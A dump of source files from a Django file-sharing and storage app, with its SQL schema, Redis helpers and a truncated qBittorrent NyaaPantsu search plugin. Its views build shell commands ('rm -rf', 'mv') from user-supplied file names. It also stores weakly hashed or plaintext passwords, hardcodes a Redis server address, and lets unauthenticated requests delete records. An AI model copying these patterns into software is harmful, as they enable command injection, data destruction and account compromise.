"text": "aliyun-python-sdk-core==2.13.14\nDjango==2.0.1\ndjango-redis==4.11.0\ndjango-tinymce==2.8.0\ngunicorn==20.0.4\njmespath==0.9.4\npycryptodome==3.9.7\nPyMySQL==0.9.3\npytz==2019.3\nredis==3.4.1\nsix==1.14.0\nwebencodings==0.5.1\n"
},
{
"alpha_fraction": 0.5401174426078796,
"alphanum_fraction": 0.553816020488739,
"avg_line_length": 24.549999237060547,
"blob_id": "f41678ecfb97012eb24e556d8331b32d375a6ec9",
"content_id": "3c5d01ce15b8921be36b594f6178b4a3fdd34cc2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1022,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 40,
"path": "/common/file_mime_.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\n\nfrom . import file_types\n\n\ndef get_file_type(mime_type: str):\n if mime_type.startswith('image/'):\n return 1\n elif mime_type.startswith('text/'):\n return 2\n elif mime_type.endswith('.pdf'):\n return 3\n elif mime_type.endswith('.doc') or mime_type.endswith('.docx'):\n return 4\n elif mime_type.endswith('.xls') or mime_type.endswith('.xlsx'):\n return 5\n elif any((mime_type.endswith('.zip'),\n mime_type.endswith('.rar'),\n mime_type.endswith('.tar'),\n mime_type.endswith('.gz'),\n )):\n return 6\n else:\n return 7\n\n\ndef get_file_mime(file_type):\n if file_type == 1:\n return 'image/*'\n elif file_type == 2:\n return 'text/*'\n elif file_type == 3:\n return 'application/pdf'\n elif file_type == 4:\n return 'application/msword'\n elif file_type == 5:\n return 'application/vnd.ms-excel'\n else:\n return 'application/zip'\n"
},
{
"alpha_fraction": 0.8384279608726501,
"alphanum_fraction": 0.8384279608726501,
"avg_line_length": 27.75,
"blob_id": "47565affbaf16303115eebaaeffe4f51db488d19",
"content_id": "365f97566404296449e1d675e5223330823a54f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 8,
"path": "/userapp/models.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nfrom mainapp.models import TUser\nfrom mainapp.models import TFile\nfrom mainapp.models import TGroom\nfrom mainapp.models import TImageLinks\nfrom mainapp.models import TWater"
},
{
"alpha_fraction": 0.5732092261314392,
"alphanum_fraction": 0.574155867099762,
"avg_line_length": 29.921951293945312,
"blob_id": "cf30f9ba4e02c73f57d4d0f178a2a2458108afee",
"content_id": "1d78315cb167b2340a9b7335614c3fa641962b70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6562,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 205,
"path": "/mainapp/views.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom common import md5_\nfrom .models import TSysUser, TUser, TSysRole, TMessage\n\nfrom fms import settings\n\n# Create your views here.\ndef login(request):\n # 分两种用户,一个是会员,一个管理员(系统)\n print('--->', request.method)\n if request.method == 'POST':\n print(request.POST)\n\n error = None\n\n username = request.POST['username'].strip()\n password = request.POST['password'].strip()\n remeber = request.POST.get('remeber', '') # checkbox\n\n password_ = md5_.hash_encode(password) # 转成md5后的密文\n\n # 验证用户名和口令是否为空\n if not all((username, password)):\n error = f'用户名或口令不能为空!'\n\n login_user = TSysUser.objects.filter(username=username, auth_string=password_).first()\n if login_user:\n # 系统管理员\n role_ = login_user.role\n login_info = {\n '_id': login_user.id,\n 'name': role_.name,\n 'code': role_.code\n }\n\n else:\n login_user = TUser.objects.filter((Q(name=username) or Q(phone=username)) and Q(auth_string=password)).first()\n if login_user:\n # 会员\n login_info = {\n '_id': login_user.user_id,\n 'name': login_user.name,\n 'code': '',\n 'head': login_user.head,\n 'email': login_user.mail,\n 'phone': login_user.phone\n }\n else:\n error = f'{username} 用户名或口令错误!'\n\n if not error:\n request.session['login_user'] = login_info\n return redirect('/')\n\n return render(request, 'login.html', locals())\n\n\ndef logout(request):\n del request.session['login_user']\n return redirect('/login/')\n\n\n@csrf_exempt\ndef block_settings(request):\n block_default_size = request.POST.get('block_default_size', settings.DEFAULT_BLOCK_SIZE)\n friend_block_size = request.POST.get('friend_block_size', settings.FRIEND_BLOCK_SIZE)\n\n if request.method == 'POST':\n settings.DEFAULT_BLOCK_SIZE = int(block_default_size)\n settings.FRIEND_BLOCK_SIZE = int(friend_block_size)\n\n type_ = request.GET.get('type_', '')\n if type_ == 'ajax':\n return JsonResponse({\n 'block_default_size': block_default_size,\n 'friend_block_size': friend_block_size\n })\n\n return render(request, 'settings.html', locals())\n\ndef index(request):\n return render(request, 'dashboard.html')\n\n\ndef message(request):\n objs = TMessage.objects.all()\n action = request.GET.get('action', '')\n if action == 'del':\n TMessage.objects.get(pk=request.GET.get('id_')).delete()\n\n return render(request, 'message/list.html', locals())\n\n\ndef role(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TSysRole.objects.get(pk=request.GET.get('role_id')).delete()\n\n roles = TSysRole.objects.all()\n return render(request, 'role/list.html', locals())\n\ndef list_sys_user(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TSysUser.objects.get(pk=request.GET.get('id_')).delete()\n\n # 查询系统时,除去超级管理员的用户\n users = TSysUser.objects.filter(~Q(pk=request.session['login_user']['_id'])).all()\n return render(request, 'sys_user/list.html', locals())\n\nclass EditRoleView(View):\n def get(self, request):\n role_id = request.GET.get('role_id', '')\n if role_id:\n role = TSysRole.objects.get(pk=role_id)\n return render(request, 'role/edit.html', locals())\n\n def post(self, request):\n from .forms import RoleForm\n role_id = request.POST.get('id', '')\n if role_id:\n form = RoleForm(request.POST, instance=TSysRole.objects.get(pk=role_id))\n else:\n form = RoleForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/role/')\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'role/edit.html', locals())\n\nclass EditSysUserView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TSysUser.objects.get(pk=id_)\n\n roles = TSysRole.objects.filter(~Q(code='admin'))\n return render(request, 'sys_user/edit.html', locals())\n\n def post(self, request):\n from .forms import SysUserForm\n id_ = request.POST.get('id', '')\n if id_:\n form = SysUserForm(request.POST, instance=TSysUser.objects.get(pk=id_))\n else:\n form = SysUserForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/list_sysuser/')\n\n errors = json.loads(form.errors.as_json())\n\n roles = TSysRole.objects.filter(~Q(code='admin'))\n\n return render(request, 'sys_user/edit.html', locals())\n\nclass EditMessageView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TMessage.objects.get(pk=id_)\n\n return render(request, 'message/edit.html', locals())\n\n def post(self, request):\n from .forms import MessageForm\n id_ = request.POST.get('id_', '')\n if id_:\n form = MessageForm(request.POST, instance=TMessage.objects.get(pk=id_))\n else:\n form = MessageForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/message/')\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'message/edit.html', locals())\n\n\nclass AuditMessage(View):\n def get(self, request):\n action = request.GET.get('action', '')\n if action:\n obj = TMessage.objects.get(pk=request.GET.get('id_'))\n if action == 'yes':\n obj.state = 1\n elif action == 'no':\n obj.state = 2\n obj.note=request.GET.get('note', '')\n obj.save()\n obj.full_clean() # 将这个持久化对像清除, 如果不清除话,则会影响下一行的查询结果\n\n objs = TMessage.objects.filter(state=0).all()\n return render(request, 'message/list_audit.html', locals())"
},
{
"alpha_fraction": 0.5718954205513,
"alphanum_fraction": 0.5980392098426819,
"avg_line_length": 15.105262756347656,
"blob_id": "83171aefe886821f7d367d9718ecbb877af2f03a",
"content_id": "c94420f24b76c5c49937e1f1085f6c4569057677",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 19,
"path": "/common/cache_.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nimport random\n\nfrom . import rd\n\n\ndef new_code(phone):\n code = set()\n while len(code) < 4:\n code.add(str(random.randint(0, 9)))\n\n code = ''.join(code)\n rd.set(phone, code, ex=120) # 单位是秒\n return code\n\n\ndef get_code(phone):\n return rd.get(phone)\n"
},
{
"alpha_fraction": 0.43826186656951904,
"alphanum_fraction": 0.45116880536079407,
"avg_line_length": 30.981651306152344,
"blob_id": "65980c982fa66dcffa1f9e8c1f3969dd3c68c6f0",
"content_id": "8e011dc9a59b956b2a79d0da9dcc1bccbdafa314",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 7137,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 218,
"path": "/media/init.sql",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "drop DATABASE if EXISTS fms;\n\ncreate DATABASE fms CHARSET=utf8;\nuse fms;\n\n\n-- 系统管理员表(超级管理员、普通员管理员、合作商超级管理员)\n\ncreate table t_sys_role(\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n name VARCHAR(20) NOT NULL UNIQUE,\n code VARCHAR(10) UNIQUE\n);\n\nINSERT t_sys_role(name, code) values\n ('超级管理员', 'admin'),\n ('普通管理员', 'mgr'),\n ('合作商超级管理员', 'fr_admin');\n\ncreate table t_sys_user(\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n username VARCHAR(20) UNIQUE NOT NULL ,\n auth_string VARCHAR(32) NOT NULL,\n nick_name VARCHAR(20),\n role_id INTEGER REFERENCES t_sys_role(id)\n);\n\nINSERT t_sys_user(username, auth_string, nick_name, role_id) VALUES\n ('disen', '43da3eb40a39ddea8d5eb2da915adb09','狄哥', 1),\n ('lili', '8e056ea961370ab19d07993abbb14e73', '小李子', 2);\n\n\n-- 不同角色有自己的菜单\ncreate table t_sys_menu(\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n name VARCHAR(20),\n parent_id INTEGER REFERENCES t_sys_menu(id),\n ord INT COMMENT '菜单显示的排序',\n url VARCHAR(50) COMMENT '菜单的连接'\n);\n\n\n-- 角色和菜单关系表\nCREATE TABLE t_sys_role_menu (\n id INTEGER PRIMARY KEY AUTO_INCREMENT,\n role_id INTEGER REFERENCES t_sys_role(id),\n menu_id INTEGER REFERENCES t_sys_menu(id)\n);\n\n\n/*==============================================================*/\n/* DBMS name: MySQL 5.0 */\n/* Created on: 2020/2/19 21:09:12 */\n/*==============================================================*/\n\n\ndrop table if exists t_block_setting;\n\ndrop table if exists t_groom;\n\ndrop table if exists t_history;\n\ndrop table if exists t_image_links;\n\ndrop table if exists t_message;\n\ndrop table if exists t_share;\n\ndrop table if exists t_user;\n\ndrop table if exists t_water;\n\ndrop table if exists t_file;\n\n/*==============================================================*/\n/* Table: t_block_setting */\n/*==============================================================*/\ncreate table t_block_setting\n(\n block_id integer not null,\n user_id integer,\n block_size int,\n last_time timestamp,\n note text,\n primary key (block_id)\n);\n\n/*==============================================================*/\n/* Table: t_groom */\n/*==============================================================*/\ncreate table t_groom\n(\n groom_id integer,\n user_id integer,\n friend_id integer\n);\n\n/*==============================================================*/\n/* Table: t_history */\n/*==============================================================*/\ncreate table t_history\n(\n history_id integer not null auto_increment,\n message_id integer,\n user_id integer,\n see_time timestamp,\n see_cnt int,\n primary key (history_id)\n);\n\n/*==============================================================*/\n/* Table: t_image_links */\n/*==============================================================*/\ncreate table t_image_links\n(\n link_id integer not null auto_increment,\n water_id integer,\n file_id integer,\n token varchar(50),\n expires integer,\n create_time char(10),\n primary key (link_id)\n);\n\n/*==============================================================*/\n/* Table: t_message */\n/*==============================================================*/\ncreate table t_message\n(\n message_id integer not null auto_increment,\n title varchar(50),\n content text,\n create_time timestamp,\n link_url varchar(100),\n note text,\n primary key (message_id)\n);\n\n/*==============================================================*/\n/* Table: t_share */\n/*==============================================================*/\ncreate table t_share\n(\n share_id integer not null auto_increment,\n file_id integer,\n friend_id integer,\n expires int,\n primary key (share_id)\n);\n\n/*==============================================================*/\n/* Table: t_user */\n/*==============================================================*/\ncreate table t_user\n(\n user_id integer not null auto_increment,\n name varchar(50),\n auth_string varchar(50),\n mail varchar(50),\n phone varchar(50),\n head varchar(50),\n label varchar(200),\n create_time timestamp,\n note text,\n primary key (user_id)\n);\n\n/*==============================================================*/\n/* Table: t_water */\n/*==============================================================*/\ncreate table t_water\n(\n water_id integer auto_increment,\n water_text VARCHAR(50),\n water_pos int,\n font_size int,\n font_name varchar(20),\n note text,\n primary key (water_id)\n);\n\n/*==============================================================*/\n/* Table: t_file */\n/*==============================================================*/\ncreate table t_file\n(\n file_id integer not null auto_increment,\n user_id integer,\n file_type char(1),\n fille_name varchar(50),\n create_time timestamp,\n last_time timestamp,\n file_size float,\n parent_file_id int,\n note text,\n primary key (file_id)\n);\n\nalter table t_block_setting add constraint FK_Reference_5 foreign key (user_id)\n references t_user (user_id) on delete restrict on update restrict;\n\nalter table t_history add constraint FK_Reference_2 foreign key (message_id)\n references t_message (message_id) on delete restrict on update restrict;\n\nalter table t_history add constraint FK_Reference_3 foreign key (user_id)\n references t_user (user_id) on delete restrict on update restrict;\n\nalter table t_image_links add constraint FK_Reference_1 foreign key (water_id)\n references t_water (water_id) on delete restrict on update restrict;\n\nalter table t_image_links add constraint FK_Reference_4 foreign key (file_id)\n references t_file (file_id) on delete restrict on update restrict;\n\nalter table t_share add constraint FK_Reference_7 foreign key (file_id)\n references t_file (file_id) on delete restrict on update restrict;\n\nalter table t_file add constraint FK_Reference_6 foreign key (user_id)\n references t_user (user_id) on delete restrict on update restrict;\n\n"
},
{
"alpha_fraction": 0.4804156720638275,
"alphanum_fraction": 0.49080735445022583,
"avg_line_length": 22.16666603088379,
"blob_id": "c952a3fea409662b31d392f46220edde4f4b457e",
"content_id": "4335d3998fc9a49ea0fde8b1549cbbcb06db9d7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1275,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 54,
"path": "/countapp/views.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "from django.http import JsonResponse\nfrom django.db import connection\n\n\n# Create your views here.\n\n\ndef block_cnt(request):\n c = connection.cursor()\n sql = \"\"\"\n SELECT sum(file_size) filesize, month(create_time) month_\n FROM t_file\n GROUP BY month(create_time)\n ORDER BY month_\n \"\"\"\n c.execute(sql)\n data = dict(c.fetchall())\n\n return JsonResponse({\n 'data': {\n 'month': [str(item) + \"月\" for item in data.values()],\n 'values': [round(item / 1024, 2) for item in data.keys()],\n 'x_title': '2020年',\n 'y_title': '空间大小(K)'\n }\n })\n\n\ndef user_cnt(request):\n c = connection.cursor()\n sql = \"\"\"\n SELECT count(user_id) cnt_, month(create_time) month_\n FROM t_user\n GROUP BY month(create_time)\n ORDER BY month_\n \"\"\"\n c.execute(sql)\n data = dict(c.fetchall())\n print(data)\n\n return JsonResponse({\n 'data': {\n 'month': [str(item) + \"月\" for item in data.values()],\n 'values': [\n {\n 'name': str(v)+\"月\",\n 'value': k\n }\n for k, v in data.items()\n ]\n },\n 'x_title': '2020年',\n 'y_title': '用户量'\n })\n"
},
{
"alpha_fraction": 0.6556291580200195,
"alphanum_fraction": 0.6556291580200195,
"avg_line_length": 17.75,
"blob_id": "0abb4195298ce39344ece2c5d2afeed20aecc66e",
"content_id": "5d7c69c1706da2e972dce407007e2bedff28a642",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/countapp/urls.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('block/', views.block_cnt),\n path('user/', views.user_cnt),\n\n]\n"
},
{
"alpha_fraction": 0.583518922328949,
"alphanum_fraction": 0.5913140177726746,
"avg_line_length": 27.03125,
"blob_id": "227fd7e2f80da38bac00be596ee43d807212679d",
"content_id": "55256b0599e8c94ea31868d77eb93634d1c5ff81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 32,
"path": "/common/files_stack.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nimport random\n\nfrom . import rd\n\n\ndef add_file_stack(user_id, file_id, file_name):\n v = ','.join([str(file_id), file_name]) # v = f'{file_id},{file_name}'\n is_finded = False\n # 查询当前的v 是否存在,如果存在,则删除其后的value\n for i, pre_v in enumerate(rd.lrange(f'pre_file_id_{user_id}', 0, -1)):\n if v == pre_v:\n is_finded = True\n rd.ltrim(f'pre_file_id_{user_id}', 0, i) # 将后面的内容截断\n\n if not is_finded: # 如果未找到,则压入回退栈中\n rd.rpush(f'pre_file_id_{user_id}', v)\n\n\ndef pop_file_stack(user_id):\n _ = rd.rpop(f'pre_file_id_{user_id}')\n file_id, filename = rd.rpop(f'pre_file_id_{user_id}').split(',')\n return file_id, filename\n\n\ndef get_pre_file_stack(user_id):\n return [tuple(x.split(',')) for x in rd.lrange(f'pre_file_id_{user_id}', 0, -1)]\n\n\ndef clear_pre_file_stack(user_id):\n rd.delete(f'pre_file_id_{user_id}')\n\n"
},
{
"alpha_fraction": 0.5888888835906982,
"alphanum_fraction": 0.6888889074325562,
"avg_line_length": 17,
"blob_id": "9d25878026ee4b2ffe1a3c081fb7cb43d0257176",
"content_id": "e46468d7792c92cfe31cf4baaf1ec0404ba5f329",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 5,
"path": "/run.sh",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd /usr/src\necho \"服务器已启动\"\ngunicorn -w 1 -b 0.0.0.0:8000 fms.wsgi:application\n"
},
{
"alpha_fraction": 0.5654979944229126,
"alphanum_fraction": 0.5668182373046875,
"avg_line_length": 32.74752426147461,
"blob_id": "dc924f2faae75dabe29a72a9fc9d82c2316e3454",
"content_id": "21262cef3fc25dc73685edf6fad726cfcea13b3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7231,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 202,
"path": "/userapp/views.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.views import View\n\nfrom common import files_stack, alisms_, file_mime_\nfrom fms import settings\nfrom .models import TUser, TFile, TImageLinks\n\n\ndef send_code(request):\n phone = request.GET.get('phone', '')\n if phone:\n code = cache_.new_code(phone) # 生成新的code\n # 发送验证码短信\n alisms_.send_code(phone, code)\n return JsonResponse({\n 'state': 0,\n 'msg': '发送成功'\n })\n\n return JsonResponse({\n 'state': 1,\n 'msg': '发送失败,请输入正确的手机号'\n })\n\n\nclass RegistView(View):\n def get(self, request):\n return render(request, 'regist.html')\n\n def post(self, request):\n phone = request.POST.get('phone', '')\n code = request.POST.get('code', '')\n password = request.POST.get('password')\n\n if not all((phone, code, password)):\n error = '注册失败,必须输入手机号、验证码和口令!'\n else:\n # 判断输入的验证码是否为向手机端发送的验证码\n if cache_.get_code(phone) != code:\n error = '请输入正确的验证码'\n else:\n user = TUser(phone=phone, auth_string=password)\n user.save()\n\n request.session['login_user'] = {\n '_id': user.user_id,\n 'name': user.phone,\n 'code': '' # 角色的code,不设置但必须是空字符串\n }\n\n return redirect('/')\n\n return render(request, 'regist.html', locals())\n\n\nclass FileView(View):\n def get(self, request):\n user_id = request.session['login_user']['_id'] # 当前会话的用户ID\n\n current_file_id = int(request.GET.get('current_file_id', 0))\n current_file_name = request.GET.get('current_file_name', '根')\n\n if current_file_id == 0:\n files_stack.clear_pre_file_stack(user_id)\n\n files_stack.add_file_stack(user_id, current_file_id, current_file_name)\n\n pre_file_stack = files_stack.get_pre_file_stack(user_id)\n files = TFile.objects.filter(parent_file_id=current_file_id, user_id=user_id)\n return render(request, 'files/list.html', locals())\n\n def update_file_path(self, file_id, old_file_path, new_file_path):\n files = TFile.objects.filter(parent_file_id=file_id)\n\n for file_obj in files.all():\n file_obj.file_path = file_obj.file_path.replace(old_file_path, new_file_path)\n file_obj.save()\n\n self.update_file_path(file_obj.file_id, old_file_path, new_file_path)\n\n def post(self, request):\n print(request.POST)\n\n current_file_id = int(request.POST.get('current_file_id', 0))\n current_file_name = request.POST.get('current_file_name', '')\n\n user_id = request.session['login_user']['_id'] # 当前会话的用户ID\n\n action = request.POST.get('action', '')\n if action and action == 'new_dir':\n save_dir = self.get_dir_path(current_file_id, user_id)\n\n file_name = request.POST.get('dir_name')\n file_path = os.path.join(save_dir, file_name)\n\n file = TFile(file_name=file_name,\n file_path=file_path,\n parent_file_id=current_file_id,\n user_id=user_id)\n file.save()\n os.makedirs(file_path) # 服务器创建目录\n # os.mkdir()\n\n if action and action == 'del':\n # 删除这个文件下的所有子目录和文件\n TFile.objects.filter(parent_file_id=request.POST.get('file_id')).delete()\n file = TFile.objects.get(pk=request.POST.get('file_id'))\n # 服务器的删除文件操作\n os.system(f'rm -rf {os.path.join(file.file_path)}')\n\n file.delete()\n\n if action and action == 'rename':\n file = TFile.objects.get(pk=request.POST.get('file_id'))\n file.file_name = request.POST.get('dir_name', '')\n\n old_file_path = file.file_path # 原目录\n dir_path, _ = os.path.split(file.file_path)\n new_file_path = os.path.join(dir_path, file.file_name)\n\n os.system(f'mv {file.file_path} {new_file_path}') # 执行服务器的修改文件目录名命令\n\n file.file_path = new_file_path # 更新数据库的新文件路径\n file.save()\n\n if file.file_type == 0:\n # 查询所有的子级目录\n self.update_file_path(file.file_id, old_file_path, new_file_path)\n\n if action and action == 'prefiles':\n current_file_id, current_file_name = files_stack.pop_file_stack(user_id)\n\n if action and action == 'upload':\n print('文件上传')\n\n upload_file: UploadedFile = request.FILES.get('file')\n # 判断当前目录是否为根路径\n save_dir = self.get_dir_path(current_file_id, user_id)\n save_file_path = os.path.join(save_dir, upload_file.name)\n\n TFile.objects.create(file_name=upload_file.name,\n file_type=file_mime_.get_file_type(upload_file.content_type),\n file_path=save_file_path,\n user_id=user_id,\n file_size=upload_file.size,\n parent_file_id=current_file_id)\n\n with open(save_file_path, 'wb') as f:\n for chunk in upload_file.chunks():\n f.write(chunk)\n\n return JsonResponse({\n 'url': '/user/files/?current_file_id=' + str(current_file_id) + \"¤t_file_name=\" + current_file_name\n })\n\n def get_dir_path(self, current_file_id, user_id):\n if not current_file_id:\n save_dir = settings.SAVE_ROOT_PATH + f'-{user_id}'\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n else:\n save_dir = TFile.objects.get(pk=current_file_id).file_path\n return save_dir\n\n\ndef download(request): # 动态资源\n # 下载文件\n from urllib.parse import quote\n\n file_id = request.GET.get('file_id')\n file = TFile.objects.get(pk=file_id)\n with open(file.file_path, 'rb') as f:\n bytes = f.read()\n\n resp = HttpResponse(content=bytes, content_type='application/octet-stream', charset='utf-8')\n\n # 设置响应头\n resp.setdefault('Content-Disposition', 'attachment;filename=' + quote(file.file_name, encoding='utf-8'))\n resp.setdefault('Content-Length', file.file_size)\n\n return resp\n\n\ndef show_img(request):\n file_id = request.GET.get('file_id')\n file = TFile.objects.get(pk=file_id)\n with open(file.file_path, 'rb') as f:\n bytes = f.read()\n\n return HttpResponse(content=bytes, content_type='image/*', charset='utf-8')\n\n\ndef create_image_link(request):\n file_id = request.GET.get('file_id')\n\n return render(request, 'files/edit.html',locals())\n"
},
{
"alpha_fraction": 0.4326923191547394,
"alphanum_fraction": 0.5064102411270142,
"avg_line_length": 15.473684310913086,
"blob_id": "486bba9409592cce797171d6acec04edd154302b",
"content_id": "8d9d102713b6f01caea650896f0471989a1f934c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 19,
"path": "/common/__init__.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nfrom redis import Redis\n\n\n# decode_responses响应的字节数据直接解码\n# 如: b'123'.decode()\nrd = Redis('47.105.137.19', db=3, decode_responses=True)\n\nfile_types = (\n (0, '目录'),\n (1, '图片'),\n (2, '文本'),\n (3, 'pdf'),\n (4, 'word'),\n (5, 'excel'),\n (6, '压缩包'),\n (7, '其它'),\n)"
}
] | 14 |
kenken28/NyaaPantsu-qBittorrent-Plugin | https://github.com/kenken28/NyaaPantsu-qBittorrent-Plugin | 6dc512fb9824ba23c0441eb27bae8e0b7a939117 | 685fcc57f45876f01586d7af6523ddfcf9779589 | 852940db0031f437d5a964402c876cbe5631c751 | refs/heads/master | 2019-07-10T09:14:33.679237 | 2017-09-19T01:20:29 | 2017-09-19T01:20:29 | 91,229,918 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5558733940124512,
"alphanum_fraction": 0.5601645112037659,
"avg_line_length": 41.96154022216797,
"blob_id": "0e208d1ef06b97d32d21c1a28fdd90f9b1531a9e",
"content_id": "9d6ac67d35930a0c0c91b63c3c093e7b4ba8face",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5593,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 130,
"path": "/nyaapantsu.py",
"repo_name": "kenken28/NyaaPantsu-qBittorrent-Plugin",
"src_encoding": "UTF-8",
"text": "#VERSION: 1.05\n#AUTHORS: Eugene ([email protected])\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author nor the names of its contributors may be\n# used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\ntry:\n # python3\n from html.parser import HTMLParser\nexcept ImportError:\n # python2\n from HTMLParser import HTMLParser\n\nfrom novaprinter import prettyPrinter\nfrom helpers import retrieve_url, download_file\n\nclass nyaapantsu(object):\n url = 'https://nyaa.pantsu.cat'\n name = 'NyaaPantsu'\n supported_categories = {'all': '0_0', \n 'software': '1_1', \n 'games': '1_2', \n 'music': '2_0', \n 'anime': '3_0', \n 'books': '4_0', \n 'tv': '5_0', \n 'pictures': '6_0'}\n \n class NyaaPantsuParser(HTMLParser):\n def __init__(self, url):\n HTMLParser.__init__(self)\n self.url = url\n self.has_nestPage = False\n self.url_nextPage = None\n self.current_item = None\n self.do_parse = False\n self.do_save_data = None\n self.td_ctr = None\n \n \n def handle_starttag(self, tag, attrs):\n if tag == 'tr':\n self.handle_start_tag_tr(attrs)\n elif tag == 'td':\n self.handle_start_tag_td(attrs)\n elif tag == 'a':\n self.handle_start_tag_a(attrs)\n \n def handle_start_tag_tr(self, attrs):\n tr_attrList = dict(attrs)\n if 'class' in tr_attrList:\n if tr_attrList['class'].startswith('torrent'):\n self.current_item = {\"engine_url\" : self.url}\n self.do_parse = True\n self.td_ctr = 0\n self.current_item['size'] = 'Unkown'\n self.current_item['seeds'] = 'Unkown'\n self.current_item['leech'] = 'Unkown'\n \n def handle_start_tag_td(self, attrs):\n td_attrList = dict(attrs)\n if td_attrList['class'].startswith('tr-size'):\n self.do_save_data = 'size'\n if td_attrList['class'].startswith('tr-se'):\n self.do_save_data = 'seeds'\n if td_attrList['class'].startswith('tr-le'):\n self.do_save_data = 'leech'\n \n def handle_start_tag_a(self, attrs):\n a_attrList = dict(attrs)\n if 'id' in a_attrList:\n if a_attrList['id'] == 'page-next':\n self.has_nestPage = True\n self.url_nextPage = self.url + a_attrList['href'].strip()\n if self.do_parse:\n if a_attrList['href'].startswith('/view'):\n self.current_item['desc_link'] = self.url + a_attrList['href'].strip()\n self.do_save_data = 'name'\n if a_attrList['href'].startswith('magnet'):\n self.current_item['link'] = a_attrList['href'].strip()\n \n def handle_data(self, data):\n if self.do_parse:\n if 